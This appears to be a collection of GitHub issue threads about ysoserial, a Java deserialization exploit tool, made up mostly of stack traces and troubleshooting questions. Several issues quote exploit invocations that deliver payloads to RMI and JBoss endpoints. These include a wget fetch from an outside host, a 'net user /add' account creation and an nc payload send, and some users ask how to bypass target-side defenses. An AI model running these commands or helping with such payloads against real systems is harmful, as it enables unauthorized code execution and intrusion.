this should be

nc 10.10.10.10 1099 < groovypayload.bin

right?

JitPack link in README fails

Clicking the JitPack link in the README to download the .jar file leads to an error:

"Tag or commit 'master-v0.0.5-16-gb617b7b' not found. Rechecking."

java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet

i download the source from github,but i cannot test "CommonsCollections3" and pop up error below, how to solve this error,thank you.

my env is windows ,java version "1.8.0_121"。

java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element entrySet
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81)
at com.sun.proxy.$Proxy0.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:452)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1909)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1808)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1353)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:373)
at ysoserial.Deserializer.deserialize(Deserializer.java:27)
at ysoserial.Deserializer.deserialize(Deserializer.java:22)
at ysoserial.payloads.util.PayloadRunner.run(PayloadRunner.java:37)
at ysoserial.payloads.CommonsCollections3.main(CommonsCollections3.java:60)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at com.intellij.rt.execution.application.AppMain.main(AppMain.java:144)

An Error Of "java -cp ysoserial-master.jar ysoserial.exploit.RMIRegistryExploit "

The whole command I use is "java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit [MyHost] 1099 CommonsCollections1 calc.exe"
And the Error is:
java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing e
lement entrySet
at sun.reflect.annotation.AnnotationInvocationHandler.invoke(Unknown Sou
rce)
at com.sun.proxy.$Proxy3.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown
Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.access$300(Unknown Source)
at java.io.ObjectInputStream$GetFieldImpl.readFields(Unknown Source)
at java.io.ObjectInputStream.readFields(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown
Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Sou
rce)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.lambda$run$0(Unk
nown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Sour
ce)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(Unknow
n Source)
at sun.rmi.transport.StreamRemoteCall.executeCall(Unknown Source)
at sun.rmi.server.UnicastRef.invoke(Unknown Source)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:4
4)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:3
8)
at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecChecking
SecurityManager.java:72)
at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:
38)
at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32)
How to resolve this?The target have commons-collections 3.2.1 and 1099 open for rmiregistry

The POC works but it breaks with a back-trace

The POC works, but the program crash...
I hope this back-trace help the developers! :)


Release: 0.0.2

java -cp ysoserial-0.0.2-all.jar ysoserial.RMIRegistryExploit X.Y.Z.A 1099 CommonsCollections1 "wget http://X.X.Y.Y/test.txt -O /tmp/test.txt"
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy4.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.defaultReadObject(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:276)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:253)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:379)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:30)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
looking up 'X.Y.Z.A.Naming'
java.rmi.UnmarshalException: error unmarshalling return; nested exception is:
java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:40)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
Caused by: java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.rmi.server.LoaderHandler$Loader.loadClass(LoaderHandler.java:1207)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at sun.rmi.server.LoaderHandler.loadClassForName(LoaderHandler.java:1221)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:453)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:186)
at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637)
at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264)
at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1774)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
... 5 more
looking up 'AAAAA.Naming'
java.rmi.UnmarshalException: error unmarshalling return; nested exception is:
java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at sun.rmi.registry.RegistryImpl_Stub.lookup(Unknown Source)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:40)
at ysoserial.RMIRegistryExploit$1.call(RMIRegistryExploit.java:23)
at ysoserial.ExecBlockingSecurityManager.wrap(ExecBlockingSecurityManager.java:39)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:23)
Caused by: java.lang.ClassNotFoundException: com.nedap.aeos.service.Naming_Stub
at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
at sun.rmi.server.LoaderHandler$Loader.loadClass(LoaderHandler.java:1207)
at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at sun.rmi.server.LoaderHandler.loadClassForName(LoaderHandler.java:1221)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:453)
at sun.rmi.server.LoaderHandler.loadClass(LoaderHandler.java:186)
at java.rmi.server.RMIClassLoader$2.loadClass(RMIClassLoader.java:637)
at java.rmi.server.RMIClassLoader.loadClass(RMIClassLoader.java:264)
at sun.rmi.server.MarshalInputStream.resolveClass(MarshalInputStream.java:214)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1613)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1518)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1774)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371)
... 5 more


Release 0.0.1

java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit X.Y.Z.A 1099 CommonsCollections1 "wget http://X.X.Y.Y/test.txt -O /tmp/test.txt"
Exception in thread "main" java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy4.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at java.util.HashMap.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.defaultReadObject(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(Unknown Source)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
at java.lang.reflect.Method.invoke(Unknown Source)
at java.io.ObjectStreamClass.invokeReadObject(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.defaultReadFields(Unknown Source)
at java.io.ObjectInputStream.readSerialData(Unknown Source)
at java.io.ObjectInputStream.readOrdinaryObject(Unknown Source)
at java.io.ObjectInputStream.readObject0(Unknown Source)
at java.io.ObjectInputStream.readObject(Unknown Source)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.dispatch(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at sun.rmi.transport.Transport$1.run(Unknown Source)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(Unknown Source)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor.runWorker(Unknown Source)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(Unknown Source)
at java.lang.Thread.run(Unknown Source)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:276)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:253)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:379)
at sun.rmi.registry.RegistryImpl_Stub.bind(Unknown Source)
at ysoserial.RMIRegistryExploit.main(RMIRegistryExploit.java:21)

Thanks for this wonderful POC! :)

No security manager: RMI class loader disabled

First of all, thanks for your work, it's awesome.

I'm testing an host who use the RMI protocol on port 22099. I could connect to it using the "jconsole" tool. However using ysoserial, I have the following stacktrace.

  • Command:

java -cp ysoserial-0.0.4-all.jar ysoserial.exploit.RMIRegistryExploit <ip> 22099 CommonsCollections1 "/sbin/ifconfig"

I have tried many different payloads to be sure and different CommonsCollections but the problem is still present.

  • Stracktrace:
java.rmi.ServerException: RemoteException occurred in server thread; nested exception is: 
    java.rmi.UnmarshalException: error unmarshalling arguments; nested exception is: 
    java.lang.ClassNotFoundException: org.apache.commons.collections.map.LazyMap (no security manager: RMI class loader disabled)
    at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:400)
    at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:255)
    at sun.rmi.transport.Transport$1.run(Transport.java:168)
    at java.security.AccessController.doPrivileged(AccessController.java:279)
    at sun.rmi.transport.Transport.serviceCall(Transport.java:164)
    at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:506)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.handleRequest(TCPTransport.java:838)
    at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:912)
    at java.lang.Thread.run(Thread.java:810)
        .......

The application server installed on the remote host is a Websphere. The RMI protocol uses serialized data, so I think it has to be vulnerable to apache commons vulnerabilities.

Thanks for your help, I will have access to this host until thursday.

question about transformerChain

In CommonsCollections1, you first create an useless ChainedTransformer : transformerChain(I say it's useless because only just constantTransformer(1)), then use the method decorate of LazyMap to create TransformedMap. At last, you use "java reflection" to modify the attribute iTransformers to malicious transformers.
Why do you just directly set transformerChain with transformers? Or is there any security check that forbids this behavior?

Why do all the serialized payloads contain java.lang.Override?

I am trying attempting to use ysoserial to generate a Groovy1 payload against an old version of elasticsearch. The payload fails to deserialize due to the presence of java.lang.Override. Specifically, elastic search seems to call the following function when resolving classes contained within a serialized stream:

protected ObjectStreamClass readClassDescriptor() throws IOException, ClassNotFoundException { int type = read(); if (type < 0) { throw new EOFException(); } switch (type) { case ThrowableObjectOutputStream.TYPE_EXCEPTION: return ObjectStreamClass.lookup(Exception.class); case ThrowableObjectOutputStream.TYPE_STACKTRACEELEMENT: return ObjectStreamClass.lookup(StackTraceElement.class); case ThrowableObjectOutputStream.TYPE_FAT_DESCRIPTOR: return super.readClassDescriptor(); case ThrowableObjectOutputStream.TYPE_THIN_DESCRIPTOR: String className = readUTF(); Class<?> clazz = loadClass(className); return ObjectStreamClass.lookup(clazz); default: throw new StreamCorruptedException( "Unexpected class descriptor type: " + type); } }

ObjectStreamClass.lookup(clazz) returns null when clazz == "java.lang.Override". I am not entirely sure what the purpose of java.lang.Override is in the serialized object but is there any way of generating payloads which do not contain this class?

Thanks in advance for the help.

issue in An Error Of "java -cp ysoserial-master.jar ysoserial.exploit.RMIRegistryExploit"

Good morning Sir

I got this error on my box today, would you please tell me what the root cause is and how to fix it?

  • i downloaded the ysoserial and extract it to desktop
  • download "ysoserial-master-v0.0.5" to this folder.
  • install Maven and run "mvn clean package -DSkipTests"
  • rename master file to ysoserial.jar
  • run the below command!

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit "mybox" "myport" CommonsCollections1 "net user /add user user"
java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set
at com.sun.proxy.$Proxy92.entrySet(Unknown Source)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:346)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
at java.util.HashMap.readObject(HashMap.java:1155)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.defaultReadObject(ObjectInputStream.java:499)
at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:331)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:601)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1004)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1891)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.defaultReadFields(ObjectInputStream.java:1989)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1913)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1796)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1348)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)
at sun.rmi.registry.RegistryImpl_Skel.dispatch(Unknown Source)
at sun.rmi.server.UnicastServerRef.oldDispatch(UnicastServerRef.java:409)
at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:267)
at sun.rmi.transport.Transport$1.run(Transport.java:177)
at sun.rmi.transport.Transport$1.run(Transport.java:174)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Transport.java:173)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:553)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:808)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:667)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)
at java.lang.Thread.run(Thread.java:722)
at sun.rmi.transport.StreamRemoteCall.exceptionReceivedFromServer(StreamRemoteCall.java:283)
at sun.rmi.transport.StreamRemoteCall.executeCall(StreamRemoteCall.java:260)
at sun.rmi.server.UnicastRef.invoke(UnicastRef.java:375)
at sun.rmi.registry.RegistryImpl_Stub.bind(RegistryImpl_Stub.java:68)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:44)
at ysoserial.exploit.RMIRegistryExploit$1.call(RMIRegistryExploit.java:38)
at ysoserial.secmgr.ExecCheckingSecurityManager.callWrapped(ExecCheckingSecurityManager.java:72)
at ysoserial.exploit.RMIRegistryExploit.exploit(RMIRegistryExploit.java:38)
at ysoserial.exploit.RMIRegistryExploit.main(RMIRegistryExploit.java:32)

Sincerely,

Support dependency isolation and/or conflicting versions

Project should be refactored to allow gadgets/chains to be generated (and unit tested) with only exactly the exact required dependencies and versions, even in cases where two different gadgets/chains require a different version of the same library (See #16). This should also reduce the likelihood of unintended classes or dependencies accidentally leaking into the payloads.

The already included jboss shrinkwrap should suffice for runtime dependency management. Make sure dependencies for gadget chains can still be bundled in the jar somehow.

It is also a goal to keep the project build and code as simple as possible for people to contribute gadgets/chains.

Option 1: Reflection

Write or use a reflection DSL that can be used by payload generation code that can use gadget classes dynamically instead of using statically linked code.

Something like jOOR might be useful for reflection.

Pros: Simple build process
Cons: Convoluted reflection-based payload generation code

Option 2: Maven/Build Voodoo

Split up project into multi-module with aggregator project to generate all-in-one jar. Gadgets/chains can go into an arbitrary number of separate sub-projects according to any dependency version conflicts.

Pros: Simple, statically linked payload generation code
Cons: Convoluted, splintered build process

Dependency version range testing

It would be useful to have a test scaffolding (within the project or in a separate project) that can test gadget chains against multiple versions of each dependency, ideally including JRE versions. This can be useful to:

  • establish a range bracket for each dependency used by a gadget chain in which it works
  • continuously test each gadget chain against its established dependency version brackets to look for regressions
  • discover gadget class serialVersionUID incompatibilities across dependency version boundaries

https://github.com/yyuu/capistrano-jdk-installer and/or http://ftp-nyc.osuosl.org/pub/jenkins/updates/updates/hudson.tools.JDKInstaller.json may be useful for JRE version testing

ysoserial on JBoss 6.1.0.Final

I am wondering whether it works on JBoss 6.1.0.Final.
I created payload and sent it using burp suite from my kali linux.

  • command: java -jar ysoserial-0.0.2-all.jar CommonsCollections1 'touch /tmp/test.txt' > payload
  • sent to /invoker/JMXInvokerServlet
    (change "GET" to "POST" and add payload in body)

But, I couldn't get /tmp/text.txt on my jboss server.
was I wrong something?
I need some guide!
Thanks for reading this.

Use XStream

It is been possible to use thise motheds with xstream.setMode(XStream.NO_REFERENCES) or not?
Can i adapte it to this method (XStream.NO_REFERENCES)
I was tried with Jdk7u21. It didn't work.

IncompleteAnnotationException when testing with OpenJDK 1.8.0_72

I'm getting the following stack trace when running the test cases with OpenJDK 1.8.0_72:

java.lang.Override missing element getType java.lang.annotation.IncompleteAnnotationException: java.lang.Override missing element getType at sun.reflect.annotation.AnnotationInvocationHandler.invoke(AnnotationInvocationHandler.java:81) at org.springframework.core.$Proxy13.getType(Unknown Source) at org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider.readObject(SerializableTypeWrapper.java:403) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1058) at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1900) at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1801) at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1351) at java.io.ObjectInputStream.readObject(ObjectInputStream.java:371) at ysoserial.Deserializer.deserialize(Deserializer.java:27)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.